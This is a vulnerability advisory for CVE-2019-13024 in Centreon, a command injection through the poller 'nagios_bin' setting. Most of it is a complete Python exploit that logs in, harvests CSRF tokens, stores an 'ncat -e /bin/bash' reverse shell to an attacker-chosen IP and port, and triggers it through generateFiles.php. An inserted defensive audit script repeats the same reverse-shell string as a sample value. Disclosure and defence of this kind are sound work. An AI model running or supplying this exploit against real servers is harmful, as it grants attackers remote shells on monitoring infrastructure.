Centreon v19.04 Remote Code Execution Vulnerability

Summary

Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allow an attacker to execute arbitrary system commands. The attacker uses the “init_script”-“Monitoring Engine Binary” value in main.get.php to insert an arbitrary command into the database, then executes it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php, which passes the inserted value from the database to shell_exec without sanitizing it.

Credit:

The information has been provided by Askar

The original article can be found at: https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/


Details

Exploitation is triggered by adding an arbitrary command in the nagios_bin parameter when setting up a new configuration or updating the configuration of a poller. The attacker can control some of the parameters passed to the updateServer function in DB-Func.php (line #506). This function updates some values and adds them to the database, so we can control the user input called nagios_bin from the configuration page and inject our malicious code into it.
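A defensive check for the issue described above, as an added example that is not part of the original advisory or of Centreon's code: it audits stored poller settings and flags any nagios_bin value that is not a plain absolute path. The row layout, the sample values and the decision to audit nagiostats_bin as well are assumptions of this example.

```python
import re

# Poller form fields holding binary paths. The advisory names nagios_bin as the
# value that reaches shell_exec; auditing nagiostats_bin too is an assumption.
PATH_FIELDS = ("nagios_bin", "nagiostats_bin")

# Allow-list: an absolute path built only from ordinary filename characters.
SAFE_PATH = re.compile(r"/(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]+")

# Characters a shell interprets; none belong in a binary path setting.
SHELL_META = set(" \t\r\n;&|`$(){}<>#'\"\\*?!~")


def audit_value(value):
    """Return the reasons a stored value is unsafe to hand to a shell."""
    reasons = []
    meta = sorted(set(value) & SHELL_META)
    if meta:
        reasons.append("shell metacharacters: " + ", ".join(map(repr, meta)))
    if not SAFE_PATH.fullmatch(value):
        reasons.append("not a plain absolute path")
    elif ".." in value.split("/"):
        reasons.append("path traversal component")
    return reasons


def audit_pollers(rows):
    """Check every path field of every poller row; return (id, field, reasons)."""
    findings = []
    for row in rows:
        for field in PATH_FIELDS:
            reasons = audit_value(row.get(field) or "")
            if reasons:
                findings.append((row["id"], field, reasons))
    return findings


# Constructed sample rows (hypothetical layout): poller 1 is clean, poller 2
# holds a value of the shape the proof of concept stores.
SAMPLE_ROWS = [
    {"id": 1, "nagios_bin": "/usr/sbin/centengine",
     "nagiostats_bin": "/usr/sbin/centenginestats"},
    {"id": 2, "nagios_bin": "ncat -e /bin/bash 192.0.2.10 4444 #",
     "nagiostats_bin": "/usr/sbin/centenginestats"},
]

if __name__ == "__main__":
    for poller_id, field, reasons in audit_pollers(SAMPLE_ROWS):
        print(f"poller {poller_id}: {field}: {'; '.join(reasons)}")
```

The same allow-list can be applied when the poller form is saved, so that a non-path value never reaches the database.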

Proof of Concept:

import requests
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./centreon-exploit.py url username password ip port")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

# one session so the login cookie is reused by the later requests
request = requests.session()

print("[+] Retrieving CSRF token to submit the login form")
page = request.get(url+"/index.php")
html_content = page.text
soup = BeautifulSoup(html_content)
token = soup.findAll('input')[3].get("value")

login_info = {
    "useralias": username,
    "password": password,
    "submitLogin": "Connect",
    "centreon_token": token
}

login_request = request.post(url+"/index.php", login_info)
print("[+] Login token is : {0}".format(token))

if "Your credentials are incorrect." not in login_request.text:
    print("[+] Logged In Successfully")
    print("[+] Retrieving Poller token")

    # the poller configuration form carries its own CSRF token
    poller_configuration_page = url + "/main.get.php?p=60901"
    get_poller_token = request.get(poller_configuration_page)
    poller_html = get_poller_token.text
    poller_soup = BeautifulSoup(poller_html)
    poller_token = poller_soup.findAll('input')[24].get("value")
    print("[+] Poller token is : {0}".format(poller_token))

    payload_info = {
        "name": "Central",
        "ns_ip_address": "127.0.0.1",
        # this value should be 1 always
        "localhost[localhost]": "1",
        "is_default[is_default]": "0",
        "remote_id": "",
        "ssh_port": "22",
        "init_script": "centengine",
        # this value contains the payload , you can change it as you want
        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
        "nagiostats_bin": "/usr/sbin/centenginestats",
        "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
        "centreonbroker_cfg_path": "/etc/centreon-broker",
        "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
        "centreonbroker_logs_path": "",
        "centreonconnector_path": "/usr/lib64/centreon-connector",
        "init_script_centreontrapd": "centreontrapd",
        "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
        "ns_activate[ns_activate]": "1",
        "submitC": "Save",
        "id": "1",
        "o": "c",
        "centreon_token": poller_token,
    }

    # save the poller configuration; nagios_bin is written to the database
    send_payload = request.post(poller_configuration_page, payload_info)
    print("[+] Injecting Done, triggering the payload")
    print("[+] Check your netcat listener !")

    # generateFiles.php reads the stored value and passes it to shell_exec
    generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
    xml_page_data = {
        "poller": "1",
        "debug": "true",
        "generate": "true",
    }
    request.post(generate_xml_page, xml_page_data)
else:
    print("[-] Wrong credentials")
    exit()

Vulnerable Systems:

Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29

CVE Information:
CVE-2019-13024

Disclosure Timeline:
07/01/2019